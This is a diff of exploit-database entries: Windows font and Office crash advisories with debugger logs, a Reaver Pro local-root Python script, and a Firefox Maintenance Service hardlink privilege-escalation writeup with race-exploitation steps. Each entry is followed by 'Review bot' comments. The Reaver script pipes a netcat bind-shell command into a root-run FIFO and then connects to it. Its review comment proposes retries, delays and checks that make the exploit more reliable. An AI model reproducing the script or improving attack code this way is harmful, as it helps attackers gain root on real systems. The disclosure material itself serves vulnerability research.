The memory read instruction causing the crash is responsible for fetching the next CharString instruction from the input stream, in order to execute it as part of the PostScript state machine. This bug is similar to issue 174 , which described the lack of the instruction pointer's bounds checking in the interpreter function, making it possible to crash the operating system or potentially disclose chunks of kernel-mode memory. While that problem was fixed in bulletin MS15-021 by introducing the missing bound checks, out-of-bounds access to the instruction stream is still possible as shown in the above crash log. The exact root cause of the vulnerability is unknown.
The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it might also possible to observe a crash on a default Windows installation, depending on the specific testcase used.
Attached is an archive with two proof of concept font files together with corresponding kernel crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37923.zip
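Review bot: the last paragraph of the description has a grammar slip, "it might also possible to observe a crash" should read "it might also be possible", and the preceding paragraph says "The exact root cause of the vulnerability is unknown" right after attributing the bug to the same class as issue 174 (missing instruction-pointer bounds checking in the CharString interpreter, fixed in MS15-021); make clear that the comparison is by symptom, the faulting "movzx eax,byte ptr [eax]" fetching the next CharString byte past the end of a Special pool allocation (bugcheck D6, READ_ADDRESS ffb4da9f Special pool), rather than a confirmed cause. The entry also cites issue 174 and MS15-021 for the earlier fix but records no identifier for this report beyond the Google issue URL; the log already carries IMAGE_NAME ATMFD.DLL and DEBUG_FLR_IMAGE_TIMESTAMP 54e6a55a, so surfacing that build in the summary would pin which ATMFD.DLL the two attached font files were tested against, and note that the "Attached is an archive with two proof of concept font files" sentence refers to the zip linked under Proof of Concept.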

platforms/windows/dos/37924.txt Executable file
@ -0,0 +1,58 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=431&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The crash is caused by a 1 bit delta from the original file at offset 0xA9B0. Standard tools did not identify anything significant about this offset in the minimized file.
Attached files:
Fuzzed minimized PoC: 3423415565_min.doc
Fuzzed non-minimized PoC: 3423415565_crash.doc
Original non-fuzzed file: 3423415565_orig.doc
DLL Versions:
wwlib.dll: 12.0.6720.5000
msptls.dll: 12.0.6682.5000
Observed Crash:
eax=0000b69a ebx=0e370fb8 ecx=0e431ee8 edx=0e433fc0 esi=abcdbbbb edi=fffffffe
eip=6bdd9ddf esp=00129c58 ebp=00129c9c iopl=0 nv up ei pl nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010207
MSPTLS!LssbFIsSublineEmpty+0xa327:
6bdd9dc4 83e808 sub eax,8
6bdd9dc7 4f dec edi
6bdd9dc8 3930 cmp dword ptr [eax],esi
6bdd9dca 7ff8 jg MSPTLS!LssbFIsSublineEmpty+0xa30c (6bdd9dc4)
6bdd9dcc 897ddc mov dword ptr [ebp-24h],edi
6bdd9dcf 8bc7 mov eax,edi
6bdd9dd1 6bc01c imul eax,eax,1Ch
6bdd9dd4 03c8 add ecx,eax
6bdd9dd6 8b7118 mov esi,dword ptr [ecx+18h]
6bdd9dd9 8945d4 mov dword ptr [ebp-2Ch],eax
6bdd9ddc 8b04fa mov eax,dword ptr [edx+edi*8]
=> 6bdd9ddf 8b5670 mov edx,dword ptr [esi+70h] ds:0023:abcdbc2b=????????
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00129c9c 6bdda05b 02000000 00129cb0 0e370fa0 MSPTLS!LssbFIsSublineEmpty+0xa327
00129cb8 6bdd481c 0e370fb8 00129d04 00129d48 MSPTLS!LssbFIsSublineEmpty+0xa5a3
00129cf8 6bde528a 0019f4cd 0019f4cd 00000000 MSPTLS!LssbFIsSublineEmpty+0x4d64
00129d70 6bde54c2 0e186fa0 00129dc8 0012a038 MSPTLS!LssbFIsSublineEmpty+0x157d2
00129d98 6bddf354 02996ec0 00129f14 0e186fa0 MSPTLS!LssbFIsSublineEmpty+0x15a0a
00129f9c 6bdc4b85 02990320 000002d4 0019f4cd MSPTLS!LssbFIsSublineEmpty+0xf89c
00129fd0 312dbeea 02990320 000002d4 0019f4cd MSPTLS!LsCreateLine+0x23
0012a044 312dba15 02a33088 0ca8c9c0 000002d4 wwlib!FMain+0x97933
0012a0ac 312db45a 0af2cf30 0e811fe8 000002d4 wwlib!FMain+0x9745e
0012a19c 6be51b27 0af2cf30 0cb10fb0 01cccb78 wwlib!FMain+0x96ea3
0012a23c 6be6a137 00000000 0e811fe8 0ccccb78 MSPTLS!FsDestroyMemory+0x1ee4e
0012a310 6be6d6f8 00000000 00000033 00000000 MSPTLS!FsDestroyMemory+0x3745e
We can see that esi has an application verifier heap chunk canary value used at the start of allocated chuncks. Clearly we've indexed somewhere we shouldn't be. In this case we can see that esi came from [ecx+18h] and ecx was moved backwards in memory due to the negative value in edi. These pointers are used later on in the vulnerable function to write data leading to memory corruption.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37924.zip
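Review bot: the closing paragraph asserts that "These pointers are used later on in the vulnerable function to write data leading to memory corruption", but the disassembly shown stops at the faulting read "mov edx,dword ptr [esi+70h]" and the stack trace contains no write site, so either include the instructions after 6bdd9ddf that perform the write or describe the impact as an out-of-bounds read until that is shown. The root-cause sentence would also be more useful if it recorded the original and fuzzed byte values at offset 0xA9B0 (the entry only says "a 1 bit delta"), because the loop at 6bdd9dc4-6bdd9dca walks eax backwards in 8-byte steps and decrements edi until it ends up at fffffffe, and the reader cannot connect that count to the flipped bit from the text alone; and "chuncks" in the same paragraph should be "chunks".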

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/55725/info
Reaver Pro is prone to a local privilege-escalation vulnerability.
A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers.
#!/usr/bin/env python
import os
print """
Reaver Pro Local Root
Exploits a hilarious named pipe flaw.
The named pipe /tmp/exe is open to anyone...
Any command echoed into it gets ran as root.
This simply launches a bindshell on 4444...
Insecurety Research | insecurety.net
"""
print ""
print "This is why TacNetSol should hire me?"
print "[+] Sending command to named pipe..."
cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe'''
os.system(cmd)
print "[+] Connecting to bind shell, enjoy root!"
os.system("nc -v localhost 4444")
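Review bot: the final line connects with "nc -v localhost 4444" immediately after the os.system(cmd) call that writes the command into the pipe, with no delay or retry, so if the root-side reader has not yet started the listener the connection is refused and the user sees no shell even though the pipe write succeeded; a short sleep or a retry loop before the connect would make it reliable. Two further points: "nc -e /bin/sh" assumes a netcat build that supports -e, which not all do, so the entry should state that as a requirement; and "echo ... >> /tmp/exe" blocks indefinitely when nothing is reading the FIFO, so a check that /tmp/exe exists and is a named pipe before writing (and a note that the target is a Unix host, given /tmp and /bin/sh) would give a clearer failure than a hang.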

@ -0,0 +1,43 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=427&can=1
Mozilla Maintenance Service: Log File Overwrite Elevation of Privilege
Platform: Windows
Version: Mozilla Firefox 38.0.5
Class: Elevation of Privilege
Summary:
The maintenance service creates a log file in a user writable location. Its possible to change the log file to a hardlink to another file to cause file corruption or elevation of privilege.
Description:
When the maintenance service starts it creates a log file under c:\programdata\mozilla\logs. This is done in maintenanceservice.cpp/SvcMain. This directory it creates the file in has fairly permissive permissions which allows a normal user to create new files underneath that directory. Its possible to race the creation of the log file during the service initialization to drop a hardlink to an existing file on the same drive (which is probably the system drive) which when opened by the maintenance service running as local system will cause the file to be overwritten by the log data.
At the very least this would corrupt the target file, however as the user has some control over bits of the contents, such as the updater path, its possible to get some user controlled contents in there. This might be used to elevate privileges by overwriting a script file which has a permissive parser, such as powershell, batch or HTA which subsequently gets executed by a privileged process.
The only slight difficulty in exploitation is that the user cannot directly delete the log file to replace it with a hardlink. However this isnt a significant issue as before opening the log file the service backs up the log to a new name leaving the directory entry for “maintenanceservice.log” free. Therefore theres a race condition between the log file being moved out of the way and the new log file being created.
So to exploit this you perform the following operations:
1. Start a thread which creates a hard link in the log directory to the file you want to overwrite. Repeat until successful.
2. In another thread start the service passing the arbitrary content you want to insert as the path to the updater file
A similar vulnerability exists in the update.status handling, for example in WriteStatusFailure which will write update.status to any location you specify. You can use a hardlink to force the file to be overwritten. In this case this would only cause file corruption as the user has no real control on the contents.
If I could recommend fixes either make the logs directory writable only by administrators or use CopyFile instead of MoveFile when backing up the previous logs. I would not recommend trying to do anything like inspecting the file for hardlinks or similar.
Proof of Concept:
Ive attached a proof of concept, its written in C#. Youll need to compile it with the C# csc compiler. NOTE: you might need to run this on a multi-core machine to stand a chance of winning the race.
1) Compile the PoC
2) Execute the PoC passing the name of a file you want to overwrite on the command line
3) Program should run and print Done if successful
Expected Result:
The log file is created as normal
Observed Result:
The target file has been overwritten with the contents of the log file
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37925.zip
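Review bot: step 2 of the exploitation procedure ("start the service passing the arbitrary content you want to insert as the path to the updater file") does not say how an unprivileged user starts the maintenance service or through which argument the updater path reaches the log, and the PoC section only says to pass the target file name, so a reader cannot tell which content ends up in the overwritten file without reading the attached C# source; one sentence naming the invocation used would close that gap. The fix suggestion to use CopyFile rather than MoveFile relies on the earlier statement that "the user cannot directly delete the log file", which in turn depends on the existing log's own ACL rather than the user-writable directory, and that dependency is worth spelling out. Smaller points: the text has lost its apostrophes throughout ("Its possible", "isnt", "theres", "Ive", "Youll") while the quotation marks around “maintenanceservice.log” survived, so this looks like an encoding slip to fix before publishing; and the entry lists Firefox 38.0.5 but no Mozilla bug or CVE reference alongside the Google issue URL.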